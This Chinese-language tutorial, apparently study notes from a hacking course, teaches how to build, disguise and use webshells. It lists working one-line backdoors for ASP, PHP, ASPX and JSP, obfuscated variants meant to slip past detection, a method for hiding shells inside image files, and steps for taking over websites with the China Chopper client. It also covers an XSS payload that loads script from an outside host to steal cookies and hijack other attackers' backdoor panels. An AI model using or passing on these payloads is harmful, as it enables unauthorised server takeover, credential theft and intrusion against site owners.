脚本木马的制作与原理
webshell(web后门,可以方便对网站进行修改)
webshell制作原理
webshell使用技巧
webshell"黑吃黑"
webshell的种类:
一句话木马
小马
大马
打包马
脱裤马
...
一句话木马:
短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用.
<%execute request("value")%>
工作原理:
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
<%execute request("value")%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell.(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了)
这就被称为一句话木马,它是基于B/S结构的.
常见写法:
asp一句话木马:
<%eval request("c")%>
php一句话木马:
<?php @eval($_POST[value]);?>
aspx一句话木马:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
jsp一句话
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
一句话变形
<?php $_REQUEST['a']($_REQUEST['b']);?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&""&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")"%>
<%a=request("gold")%><%eval a%>
将一句话木马放到网站之后,去连接它,网页是空白的.
中国菜刀去连接它,参数写value值(reg:cmd),然后整个网站就拿下了
中国菜刀->右侧配置->(数据库管理)
右键->虚拟终端->help
SETP c:\windows\system32\cmd.exe
如果还是拒绝,只能是上传脚本了
123.php
<?php
@eval($_REQUEST['xx']);(//这里的xx也可以叫做是密码)
?>
<?php
@system($_REQUEST['xx']);(//这里的xx也可以叫做是密码)
?>
->注入?xx=ipconfig
<?php
@exec($_REQUEST['xx']);(//这里的xx也可以叫做是密码)
?> 还要再加一个pre才行
如果有缓存,,可以右键重置缓存库
mantra第二行传参->xx=phpinfo();
jsp的做法:
菜刀可以
webshell->jsp->复制代码->aaa.jsp
将http://xxx/aaa.jsp复制
caidao->右键->第二个文件夹->第二个文件,代码复制
提交之后,访问,会报500错误.
菜刀->地址复制过来,密码添上 jsp一般选utf-8
(还有一款红色菜刀)
一句话图片马的制作:
C32下做一句话
打开c32,把图片放里面,写入一句话保存..退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性->详细信息->版权内插入一句话即可
mspaint画图->保存图片->右键->详细信息->版权
这种方法一般都能防护找到.
代码审计->C32
图片拖进去->十六进制,复制一句话代码->在十六进制最后粘贴
->直接连图片是没有作用的,还需要改一下.
常见的一句话客户端
一句话最常用的客户端为:
一句话客户端增强版
中国菜刀
中国砍刀
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版
小马
小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能.
大马
大马体积比较大,一般50k以上.功能也多,一般都包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序的功能.这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类 程序.
提权拿服务器的
webshell使用技巧:
一句话使用:
首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库
,或者加进asp网页
记住,我们的目的是把一句话<%execute request("value")%>>添加到数据库,无论任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者asp网页,然后进入此网站服务器.
内容编码
配合解析漏洞
配合文件包含
利用文件名溢出
多次编码打乱,用一些函数去绕waf
图片一般不会杀掉.
webshell"黑吃黑"
找shell后门
查找后门:
查找webshell后门
找到后门地址
反搞webshell箱子
Mantra->右键->在网络->HTML找请求
按钮事件可能会导致后门触发
菜刀有后门,(300万箱子),会把自身数据传送过去
300w箱子:一句话,shell,有人用菜刀连shell,它就会把这些shell都会传到后门服务器上,然后就会获取使用菜刀这些人的 信息
箱子就俩文件->index.asp,caolist.asp
怎么反搞它呢?
用XSS平台打一个cookie
http://pip3.win/xss.php?do=project&act=viewcode&ty=create&id=16
xss代码:
<sCRiPt sRC=http://pip3.win/qtCa></sCrIpT>
http://127.0.0.1:99/shell?u=http://127.0.0.1:99/1.asp&p=222
->后退->p.222改成<sCRiPt sRC=http://pip3.win/qtCa></sCrIpT>
然后在XSS网站右侧->test查看登录信息
如果能有cookie的话,就可以欺骗登录了
->漏洞利用->马哥
copy->访问->将cookie强制修改,就能登录后后门地址了
协议:http,tcp都可以
嗅探欺骗->WSE->抓包(用户名包跟密码包)->复制代码->mantra->url解码
(主要是抓http来抓的)
tcp用???去抓(没听出来)
改host文件,这样可以阻止后门传送.
大马上传上去删不掉的,用替换,但不执行,然后删除